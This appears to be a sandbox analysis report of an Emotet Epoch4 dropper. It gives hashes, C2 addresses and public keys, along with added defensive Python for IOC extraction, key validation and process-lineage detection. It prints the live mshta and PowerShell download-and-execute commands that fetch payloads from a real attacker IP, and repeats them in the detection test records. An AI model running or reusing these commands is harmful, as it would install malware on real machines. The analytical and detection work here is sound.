General

  • Target

    9296f02a362c27b1e3a3b4119ede64ea52b6c0430fc70517e5146730c23c987d

  • Size

    70KB

  • Sample

    220121-ag8rescdgl

  • MD5

    e85aa320fc84a740efaa1e2ce533bcda

  • SHA1

    3967a9b469537e2d5854727020d298f37edded63

  • SHA256

    9296f02a362c27b1e3a3b4119ede64ea52b6c0430fc70517e5146730c23c987d

  • SHA512

    4968e18fad786be5f207f6124f266ce1844dc7e797688308e692ff7a788ca1558abf6cdcaa5b692b093740b4eeff070aeb14bf18ab1b936a3b6c02e4d8f67572

Malware Config

Extracted

Language
hta
Source

mshta http://0xb907d607/fer/fe2.html

URLs
hta.dropper

http://0xb907d607/fer/fe2.html

The host is not a domain: 0xb907d607 is the IPv4 address 185.7.214.7 written as a single hexadecimal integer (0xb9.0x07.0xd6.0x07), a form Windows URL parsing accepts but that defeats naive dotted-quad pattern matching. It is the same host the PowerShell stage fetches fe2.png from.

Extracted

Language
ps1
Deobfuscated

# powershell snippet 0
$c1 = "(New-Object Net.We"
$c4 = "bClient).Downlo"
$c3 = "adString('http://185.7.214.7/fer/fe2.png')"
$ji = "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"
invoke-expression "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"|invoke-expression

# powershell snippet 1
(new-object net.webclient).downloadstring("http://185.7.214.7/fer/fe2.png")

URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png
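Reading the two stages above by hand works for one sample, but the same two tricks recur across droppers: an IPv4 address written as a single hex integer so the HTA URL does not look like an address, and a download cradle split into string fragments so that DownloadString never appears contiguously. The following Python is an added example, not output from the sandbox or code from the page: it canonicalises inet_aton-style IP literals (hex, octal, decimal dword and short forms, which goes beyond the single hex form this sample uses), statically folds the fragment-concatenation pattern, and reports the download URLs. The pre-deobfuscation form of the PowerShell stage ($ji = $c1 + $c4 + $c3) is an assumption; the report only prints the already-joined result.

```python
from __future__ import annotations
import ipaddress
import re

# Constructed inputs, not sandbox output: the HTA command exactly as the report
# shows it, and an ASSUMED pre-deobfuscation form of the PowerShell stage (the
# report only prints the joined string; the $c1 + $c4 + $c3 join is a guess).
HTA_STAGE = "mshta http://0xb907d607/fer/fe2.html"
PS_STAGE = """\
$c1 = "(New-Object Net.We"
$c4 = "bClient).Downlo"
$c3 = "adString('http://185.7.214.7/fer/fe2.png')"
$ji = $c1 + $c4 + $c3
invoke-expression $ji | invoke-expression
"""


def _parse_component(tok: str) -> int:
    """One inet_aton component: 0x.. is hex, a leading 0 is octal, else decimal."""
    tok = tok.lower()
    if tok.startswith("0x"):
        return int(tok[2:], 16)
    if len(tok) > 1 and tok.startswith("0"):
        return int(tok, 8)
    return int(tok, 10)


def normalize_host(host: str) -> str:
    """Canonicalise inet_aton-style IPv4 literals (1 to 4 components, each hex,
    octal or decimal; e.g. 0xb907d607, 3104298503, 0271.07.0326.07, 185.7.54791)
    to dotted-decimal. Anything else (a DNS name) is returned unchanged."""
    try:
        vals = [_parse_component(p) for p in host.split(".")]
    except ValueError:
        return host
    if not 1 <= len(vals) <= 4:
        return host
    n = 0
    for v in vals[:-1]:                 # leading components are single bytes
        if v > 0xFF:
            return host
        n = (n << 8) | v
    tail_bits = 8 * (5 - len(vals))     # the last component fills what is left
    if vals[-1] >> tail_bits:
        return host
    return str(ipaddress.IPv4Address((n << tail_bits) | vals[-1]))


_URL = re.compile(r"(https?)://([^\s/'\"()]+)(/[^\s'\"()]*)?", re.I)


def extract_urls(text: str) -> list[str]:
    """URLs found in a stage, with any obfuscated IP host rewritten."""
    return [f"{s.lower()}://{normalize_host(h)}{p}" for s, h, p in _URL.findall(text)]


_TOKEN = re.compile(r"\$\w+|\"[^\"]*\"|'[^']*'")
_ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*(.+?)\s*$", re.M)
_IEX = re.compile(r"^\s*(?:invoke-expression|iex)\s+(.+?)\s*(?:\|.*)?$", re.M | re.I)


def deobfuscate_ps(script: str) -> dict:
    """Statically fold the fragment pattern ($a="..";$b="..";$x=$a+$b;IEX $x):
    each assignment becomes the concatenation of its literal and variable
    tokens, then the argument handed to invoke-expression is expanded.
    Only string literals and '+' joins are handled; anything else is kept verbatim."""
    env: dict[str, str] = {}

    def fold(expr: str) -> str:
        out = []
        for tok in _TOKEN.findall(expr):
            if tok.startswith("$"):
                out.append(env.get(tok[1:].lower(), tok))  # unknown variable: keep
            else:
                out.append(tok[1:-1])                       # drop the quotes
        return "".join(out)

    for m in _ASSIGN.finditer(script):
        env[m.group(1).lower()] = fold(m.group(2))
    payloads = [fold(m.group(1)) for m in _IEX.finditer(script)]
    return {"vars": env, "payloads": payloads}


def stage_iocs(hta: str, ps: str) -> list[str]:
    """Canonical download URLs from both stages, in execution order, de-duplicated."""
    found = extract_urls(hta)
    for payload in deobfuscate_ps(ps)["payloads"]:
        found.extend(extract_urls(payload))
    return list(dict.fromkeys(found))


if __name__ == "__main__":
    for url in stage_iocs(HTA_STAGE, PS_STAGE):
        print(url)
```

Running extract_urls directly over the raw PowerShell text would miss the URL, because no fragment contains a whole URL; folding first and scanning the expanded invoke-expression argument is what recovers it. The folder deliberately does not execute anything: it understands only literals and `+`, so a script that builds its string any other way falls through untouched rather than being mis-read.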

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
-----END PUBLIC KEY-----

ecs1.plain

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
-----END PUBLIC KEY-----
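Both PEM blocks share the prefix MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE, which is the DER SubjectPublicKeyInfo header for an uncompressed prime256v1 (P-256) point; public Emotet analyses describe ECK1 as the key the bot uses for ECDH key agreement with the C2 and ECS1 as the ECDSA key it verifies C2 responses with, which is context from those analyses rather than something this report states. Before a config like this is pushed into a tracker or used to cluster samples it is worth checking that the keys are what they claim to be. The following Python is an added example, not a tool from the page or from the sandbox: it decodes the two keys above in pure Python (no third-party library), confirms the P-256 SPKI layout, checks that each point actually lies on the curve using the standard P-256 parameters, derives a SHA-256 fingerprint of the DER for use as an indicator, and confirms the two keys differ.

```python
import base64
import hashlib

# Copies of the two PEM blocks from the extracted config above.
ECK1_PEM = """\
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
-----END PUBLIC KEY-----
"""
ECS1_PEM = """\
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
-----END PUBLIC KEY-----
"""

# DER SubjectPublicKeyInfo for an uncompressed prime256v1 point:
#   SEQUENCE { SEQUENCE { OID id-ecPublicKey, OID prime256v1 },
#              BIT STRING { 0x00 unused bits, 0x04 || X (32 bytes) || Y (32 bytes) } }
P256_SPKI_PREFIX = bytes.fromhex("3059301306072a8648ce3d020106082a8648ce3d03010703420004")
# prime256v1 / secp256r1 domain parameters: y^2 = x^3 - 3x + b  (mod p)
P256_P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
P256_B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B


def pem_to_der(pem: str) -> bytes:
    """Strip the PEM armour and decode the base64 body strictly, so a garbled
    character is an error rather than being silently skipped."""
    body = "".join(line.strip() for line in pem.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body, validate=True)


def parse_p256_spki(der: bytes) -> tuple:
    """Return (x, y) from a 91-byte uncompressed P-256 SPKI; anything else is rejected."""
    if len(der) != 91 or not der.startswith(P256_SPKI_PREFIX):
        raise ValueError("not an uncompressed prime256v1 SubjectPublicKeyInfo")
    return int.from_bytes(der[27:59], "big"), int.from_bytes(der[59:91], "big")


def on_p256_curve(x: int, y: int) -> bool:
    """True iff (x, y) satisfies the curve equation; a flipped byte or a swapped
    base64 line in an extracted key fails this check."""
    if not (0 < x < P256_P and 0 < y < P256_P):
        return False
    return (y * y - (x * x * x - 3 * x + P256_B)) % P256_P == 0


def spki_fingerprint(der: bytes) -> str:
    """SHA-256 over the DER SPKI: a compact handle for the key that does not
    depend on how the PEM text happens to be wrapped."""
    return hashlib.sha256(der).hexdigest()


def validate_emotet_keys(eck1_pem: str, ecs1_pem: str) -> dict:
    """Sanity-check an extracted config: both keys are well-formed P-256 points
    on the curve, and the two keys are distinct (an extractor that returns the
    same blob twice has mis-parsed the sample)."""
    report = {}
    for name, pem in (("eck1", eck1_pem), ("ecs1", ecs1_pem)):
        der = pem_to_der(pem)
        x, y = parse_p256_spki(der)
        report[name] = {"x": x, "y": y, "on_curve": on_p256_curve(x, y),
                        "fingerprint": spki_fingerprint(der)}
    report["distinct"] = report["eck1"]["fingerprint"] != report["ecs1"]["fingerprint"]
    report["ok"] = report["distinct"] and report["eck1"]["on_curve"] and report["ecs1"]["on_curve"]
    return report


if __name__ == "__main__":
    result = validate_emotet_keys(ECK1_PEM, ECS1_PEM)
    for name in ("eck1", "ecs1"):
        print(name, "on_curve=%s" % result[name]["on_curve"], result[name]["fingerprint"])
    print("ok", result["ok"])
```

The fingerprint, not the PEM text, is the value to store and compare: the same key re-emitted with different line wrapping or as raw DER still hashes identically, while any change to the point changes it.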

Targets

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Drops file in System32 directory
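The signature names above are what the sandbox fired; the point a detection engineer takes from them is the process lineage (mshta.exe launching powershell.exe) rather than any string inside the script. The following Python is an added example, not the sandbox's own signature logic, run over constructed Sysmon-style process-creation records modelled on this chain: it flags the remote HTA fetch, an unexpected child of a script host or Office application, the hex-IP URL, and the PowerShell download cradle. On the second record the split `Downlo`/`adString` defeats a plain DownloadString keyword and the cradle rule only fires because `invoke-expression` is still literal in the command line, which is exactly why the lineage rule is the one to rely on.

```python
import re

# Constructed Sysmon event-ID-1 style records modelled on the chain in this
# report (explorer -> mshta -> powershell) plus two controls; not sandbox output.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://0xb907d607/fer/fe2.html"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell -w hidden -c \"$c1='(New-Object Net.We';$c4='bClient).Downlo';"
                     "$c3='adString(''http://185.7.214.7/fer/fe2.png'')';$ji=$c1+$c4+$c3;"
                     "invoke-expression $ji|invoke-expression\"")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe https://example.com/"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c whoami"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CHILD_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Keyword rule: cheap, but defeated by string splitting (see record 1 above).
_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string", re.I)
# IPv4 written as one hex or decimal integer instead of a dotted quad.
_OBFUSCATED_IP_URL = re.compile(r"https?://(?:0x[0-9a-f]+|\d{8,10})(?=[/:\s\"']|$)", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(event: dict) -> list:
    """Names of the rules that fire on one process-creation record, in rule order."""
    parent, child = image_name(event["ParentImage"]), image_name(event["Image"])
    cmd = event["CommandLine"]
    hits = []
    if child == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta_remote_hta")            # HTA pulled from the network
    if parent in SCRIPT_HOSTS | OFFICE_APPS and child in CHILD_SHELLS:
        hits.append("unexpected_child_of_" + parent.rsplit(".", 1)[0])
    if child in {"powershell.exe", "pwsh.exe"} and _CRADLE.search(cmd):
        hits.append("powershell_download_cradle")
    if _OBFUSCATED_IP_URL.search(cmd):
        hits.append("obfuscated_ip_url")
    return hits


def scan(events: list) -> list:
    """(index, hits) for every record on which at least one rule fired."""
    results = []
    for i, event in enumerate(events):
        hits = match_rules(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(EVENTS):
        ev = EVENTS[i]
        print(i, image_name(ev["ParentImage"]), "->", image_name(ev["Image"]), hits)
```

The lineage rule is the one that survives obfuscation: however the script is encoded, mshta.exe (or Word) has no business starting PowerShell, and that fact is visible in the process tree regardless of the command line.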

MITRE ATT&CK Enterprise v6
